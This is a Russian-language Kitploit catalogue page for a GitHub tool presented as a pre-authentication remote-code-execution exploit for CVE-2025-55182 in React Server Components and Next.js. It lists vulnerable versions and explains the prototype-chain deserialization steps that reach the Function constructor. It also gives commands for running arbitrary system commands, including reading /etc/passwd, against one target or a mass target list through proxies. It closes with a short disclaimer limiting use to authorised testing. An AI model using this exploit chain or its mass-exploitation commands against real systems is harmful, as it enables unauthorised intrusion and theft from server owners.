Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Эксплойт удаленного выполнения кода до аутентификации для React Server Components и Next.js через уязвимость десериализации. Поддерживает сканирование одиночной цели и пакетное сканирование с прокси и многопоточностью. | Kitploit
Инструменты/GitHubGitHub/luoluoqingge/cve-2025-55182
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubluoluoqingge/cve-2025-55182

CVE-2025-55182

Эксплойт удаленного выполнения кода до аутентификации для React Server Components и Next.js через уязвимость десериализации. Поддерживает сканирование одиночной цели и пакетное сканирование с прокси и многопоточностью.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
15 месяцев назадЕщё не проверено

CVE-2025-55182 - React2Shell

React Server Components / Next.js Предварительная аутентификация Удаленное выполнение кода

АтрибутЗначение
CVE IDCVE-2025-55182
CVSS10.0 (Критический)
CWECWE-502: Десериализация недоверенных данных
ТипPre-Auth RCE

Затронутые версии

КомпонентУязвимые версии
React19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js15.0.0 ~ 15.0.4, 15.1.0 ~ 15.1.8, 15.2.x ~ 15.5.6, 16.0.0 ~ 16.0.6
Связанные пакетыreact-server-dom-webpack, react-server-dom-turbopack, react-server-dom-parcel

Принцип уязвимости

Эта уязвимость использует недостаток десериализации в протоколе Flight React Server Components (RSC). Путем создания вредоносного multipart/form-data запроса достигается неавторизованное удаленное выполнение кода. Полная цепочка эксплуатации:

  1. Через POST multipart/form-data с заголовком Next-Action инициируется путь Server Action
  2. Chunk "0" содержит специально сконструированный JSON-объект (не обернутый в массив), $1:__proto__:then обращается к Chunk.prototype.then на объекте Chunk 1 в состоянии PENDING, делая его thenable
  3. $1:constructor:constructor через цепочку прототипов разрешается в конструктор Function
  4. Chunk.prototype.then вызывает initializeModelChunk, который анализирует поле value — '{"then":"$B0"}'
  5. Blob $B0 вызывает _formData.get(_prefix + "0"), то есть Function(code + "0")

Установка зависимостей

root@kitploit:~
pip install requests[socks]

При отсутствии зависимостей скрипт автоматически попытается установить requests и PySocks.

Использование

RCE на одну цель

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 -c "id"

Массовая эксплуатация

root@kitploit:~
python CVE-2025-55182.py -f targets.txt -c "cat /etc/passwd" -o results.txt

Только проверка уязвимости (без выполнения команд)

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 --check
python CVE-2025-55182.py -f targets.txt --check -o vuln_hosts.txt

Использование прокси

root@kitploit:~
# HTTP прокси
python CVE-2025-55182.py -u http://target:3000 -c "whoami" --proxy http://127.0.0.1:8080

# SOCKS5 прокси
python CVE-2025-55182.py -f targets.txt -c "id" --proxy socks5://127.0.0.1:1080

Режим отладки

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 -c "id" -v

Полное описание параметров

Пояснение вывода

  • VULN — Цель уязвима, успешно получен результат выполнения команды
  • MAYBE — Возможно уязвима (например, истекло время чтения)
  • ERR — Ошибка подключения
  • SAFE — Уязвимость не обнаружена

Результаты массового сканирования записываются в файл, указанный в -o, сохраняются только цели с подтвержденной уязвимостью.

Пример формата targets.txt

root@kitploit:~
http://192.168.1.10:3000
https://app.example.com
http://10.0.0.5:3000/dashboard
# Строки с комментариями игнорируются

Отказ от ответственности

Данный инструмент предназначен только для авторизованного тестирования безопасности и исследовательских целей. Пользователь должен убедиться, что у него есть явное разрешение владельца целевой системы. Несанкционированное проведение пентестов является незаконным, и пользователь несет полную юридическую ответственность.

Скачать инструмент
  • Возвращаемый функциональный объект сам обладает свойством then, считается thenable и вызывается, что приводит к выполнению кода и получению RCE
  • ПараметрОписаниеЗначение по умолчанию
    -u, --urlURL одной цели (взаимоисключающ с -f)-
    -f, --fileФайл со списком URL целей, по одной в строке (взаимоисключающ с -u)-
    -c, --commandСистемная команда для выполнения (необязательна в режиме --check)-
    -o, --outputФайл для вывода результатовresults.txt
    -t, --threadsКоличество параллельных потоков10
    -v, --verboseПоказывать отладочный выводFalse
    --proxyАдрес прокси, поддерживается HTTP и SOCKS5-
    --timeoutТайм-аут запроса (сек)15
    --checkТолько проверка уязвимости, без выполнения командFalse
    --verify-sslПроверять сертификаты TLSFalse